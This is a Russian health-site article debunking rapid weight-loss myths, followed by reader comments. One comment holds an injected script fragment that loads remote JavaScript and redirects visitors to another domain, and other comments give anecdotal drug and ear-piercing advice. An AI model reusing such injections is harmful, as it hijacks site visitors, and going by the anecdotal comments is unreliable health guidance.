Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  6 вещей, которые вы должн...  >>  6 вещей, которые вы должны знать о быстром и эффективном похудении
 
Обратная связь
 

6 вещей, которые вы должны знать о быстром и эффективном похудении

Размер шрифта
23 июня 2011 07:04
  • google_analytics: false
  • Нравится

По данным Всемирной организации здравоохранения, 250 миллионов жителей стран первого мира страдает от ожирения, еще 500 миллионов скоро пополнят их ряды. Среди них – наши близкие, члены семьи, возможно, мы сами. Люди всеми силами пытаются избавиться от пары-тройки лишних килограммов, а потом теряют свое здоровье. И все хотят сделать это как можно «быстрее и эффективнее» при помощи разнообразных диет. Читайте 6 положений об «эффективных диетах для быстрого похудения».

zdorovieinfo.ru

Александр Тушкин / «Здоровье инфо»

Положение 1. Не существует эффективной диеты для быстрого похудения, которая была бы безопасна для здоровья

Большинство диет обещают прямо-таки невозможные результаты: якобы за неделю можно сбросить до 7 кг. Получается, по килограмму в день. ВОЗ рекомендует ограничить потерю веса до 2 кг для женщин и 4 кг для мужчин в месяц. Другими словами, за месяц потеря веса не должна превышать 2-3% от исходной массы тела. Так, женщина весом в 65 кг должна сбросить за месяц не более 2 кг.

Похудение сверх указанной нормы должно проводиться под контролем врача в рамках лечения определенного заболевания, симптомом которого является ожирение. Например, диабет 2 типа, при котором больные быстро набирают вес из-за нарушения механизмов взаимодействия инсулина с клетками. Если диеты и лечебная физкультура не помогают, то больные начинают пить серьезные лекарства – бигуаниды. Просто «полные люди» не нуждаются в таком серьезном вмешательстве, поэтому для них должна быть разработана адекватная методика похудения, которая подразумевает постепенный сброс веса с помощью правильного рациона питания и занятий физическими упражнениями.

Положение 2. Монокомпонентные диеты вредны

Монокомпонетные диеты или монодиеты подразумевают употребление какого-либо одного продукта в течение продолжительного времени (список популярных монодиет мы приводили в нашей статье).

Ни один продукт на свете не обладает полным набором полезных веществ, необходимым для полноценного функционирования организма. Во время монодиеты вы подвергаете свое тело серьезному испытанию, когда оно вынуждено существовать в условиях дефицита. Некоторые из недостающих веществ могут оказаться критическими для жизни, например, калий, который отвечает за регуляцию сердечной деятельности. А при недостатках кальция вас могут преследовать мышечные судороги.

Положение 3. «Эффективные диеты для быстрого похудения» не связаны с «очищением организма»

Популярный миф об «очищении организма» активно эксплуатируется некомпетентными источниками и производителями товаров альтернативной медицины. Для похудения нет необходимости «чиститься». Такого понятия, как шлаки, в доказательной медицине не существует. Садясь на очередную «эффективную диету для похудения», вы просто заставляете свой организм испытывать дефицит калорий, а не чистите его от «шлаков».

Организм действительно способен накапливать вредные вещества, например, вредные выбросы химической промышленности. Но избавиться от них в домашних условиях просто невозможно.

Положение 4. «Лишней воды» в организме не существует

Всем известна присказка о том, что человек более чем на 60% состоит из воды. При этом большинство людей слепо следуют мифу о том, что эффективная диета для быстрого похудения избавит их от «лишней воды». Откуда ей взяться, если вся вода в теле – нужная? Люди с переизбытком воды в организме встречаются крайне редко. В действительности, большинство страдающих от лишнего веса испытывают ее недостаток. Отеки также не являются показателем «лишней воды», это всего лишь результат ее неправильного распределения и проблем с почками. Иногда они могут свидетельствовать о том, что воды в организме не хватает.

Положение 5. После эффективных диет для быстрого похудения вес возвращается на фоне гормональных изменений

Испанские ученые из Центра биомедицинских исследований ожирения и питания при Университете в Сантьяго в 2010 году установили, что потерянный после диеты вес возвращается по вине гормонов. Ученые заставили 108 человек терять вес на диете, а потом взвесили их через 32 недели. Оказалось, что лишь 5% испытуемых сохранили достигнутые результаты. Последующий анализ крови показал повышенное содержание гормона лептина в крови и пониженное – грелина.

Против природы не попрешь – таков механизм сохранения жировых запасов в организме. Так что подходящей диетой можно считать только ту, на которой вы сможете сидеть всю жизнь.

Положение 6. Для похудения работают лишь самые простые вещи

Забудьте о многочисленных товарах для похудения – 99% из них просто не работают. В 2010 году европейские ученые в ходе двух исследований установили, что все популярные БАДы для похудения не эффективнее плацебо. А лекарства для похудения и вовсе опасны для жизни.

Чтобы похудеть, необходимо создать для тела ситуацию энергетического дефицита за счет физических нагрузок и правильного питания. Это те самые простые вещи, которых вы все это время так старательно избегали.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

17 апреля 2012 в 20:16

Цитировать   |   Пожаловаться

Хорошие таблетки действительно помогут. Более того я считаю, это хорошее подспорье в похудении, тот же ксеникал. Пока пьешь, постепенно меняешь свое меню, начинаешь питаться другими блюдами, другими продуктами, я только когда стала принимать, смогла постепенно отказаться от хлеба, хотя 25 лет его ела и не думала вообще о его вреде. В итоге вышло минус 14,5 кг. А диета это с места в карьер,даже самая основательная и продуманная, и по сути просто насилие над организмом, и далеко не всем хватает сил, чтобы долго на ней продержаться.

2 - Гость

02 мая 2013 в 19:58

Цитировать   |   Пожаловаться

Знакомый худеет с золотой в ухе.За год сбросил 75 кг! Эффективна ли такая диета?? Устанавливают такие"чудо-серьги" в Твери.

3 - Гость

08 июля 2013 в 12:39

Цитировать   |   Пожаловаться

После первых родов набрала 35 кг..то есть 60+35...роды..кормление до 1.5 года, не рисковала заниматься диетами и т п...конечно какой то вес ушел...но все же лишних 25 осталось...перестала кормить и в течении 2 лет перепробовала массу диет..и кремлевскую, и на овощах, голодание (7 дней)(голодание в смысле ничего кроме воды!), диета Л.Долиной,, потом еще какая то (3 дня рис, три дня кур.грудка и еще что то..уже не помню)...короче  я сейчас даже не вспомню все что пыталась делать...последним был поход в славянскую клинику, меня там не приняли т к у меня сердце больное...вообщем..- результат диет - каждый раз теряла от 5 до 13 кг...но потом вес постепенно возвращался...еще и в большем количестве, хотя я после диет не объедалась..., в конце концов случилось так что я вышла на работу...у меня поменялся график жизни...начала ходить на танцы (спортзал) и просто мало кушать (хотя ела все что угодно - тортики и т п)  и на ночь бывало...короче я тогда уже просто смирилась с тем, что не получается худеть...и вот чудо...я за 4 месяца сбросила эти ненавистные кило...я сделала вывод...что первое и самое главное - не переедать!! второе это физическая нагрузка! любая это может быть что угодно лишь бы вам было комфортно и с удовольствием......вот и все...третье тоже важно - не допускайте чтобы вы проголодались на столько, что хочется не кушать, а жрать!....так что с автором статьи согласна на все 100%! часто таблетки для похудения это либо слабительное либо мочегонное, в этом случае потеря веса происходит просто за счет обезвоживания  организма (,ну почитайте же вы Бога ради состав!!!) многие из них содержат психотропные вещества, которые просто отключают у вас чувство голода, иногда в БАДах содержатся те же вещества что и в энергетических напитках (то есть вы вроде бы чувствуете себя хорошо и силы есть, но голода нет)...ну разве это нормально?! ...моему второму ребенку сейчас 1.2...так что опять прохожу по новому все это...но теперь уже грамотно, не экспериментирую....просто кушаю чуть меньше чем расходую...ем абсолютно все..за год похудела на 13 кг......в Славянской клинике услышала потрясающую фразу - никогда не начинайте делать то, что не будете делать постоянно! абсолютно согласна...так что подумайте, подберите для себя тот ритм жизни и питание, которые вы будете соблюдать постоянно, и поверьте, у вас все будет замечательно!


4 - Гость

24 декабря 2013 в 16:43

Цитировать   |   Пожаловаться

Гость 02 мая 2013 в 19:58
Знакомый худеет с золотой в ухе.За год сбросил 75 кг! Эффективна ли такая диета?? Устанавливают такие"чудо-серьги" в Твери.
 Была у меня такая сережка, она действует недолго + сережка не сама по себе работает, а вы еще должны будете соблюдать диету. Дополнительно к сережке вам еще должны делать иглоукалывание, т.к сережка проколота в той точке, которая отвечает за аппетит. Это самая больная точка в козелке.

5 - genafirst12

27 мая 2015 в 17:08

Комментарий удален за нарушение Правил общения

6 - zzzzzz

01 июля 2015 в 00:10

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
5 рецептов овощных супов для похудения   Как уменьшить жир на лице?   Квашеная капуста для похудения   10 правил бега для похудения  
05 августа 2011Худеющие и похудевшие думают по-разному 26 июля 2011Диеты помогают только молодым
 
28 мая 2013Бактерии спасут человечество от ожирения! Новый метод похудения от гарвардских ученых 15 августа 2012Обнаружены механизмы, контролирующие ожирение и атеросклероз!
 

Слайдшоу

1
Как нас обманывают! Продукты-обманщики!
10 вещей, которые поймут только те, кто хочет похудеть
Как справиться с обжорством?

Тесты

1
Есть ли у вас избыточный вес?
Жиры, которые мы едим
Правильно ли вы худеете?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.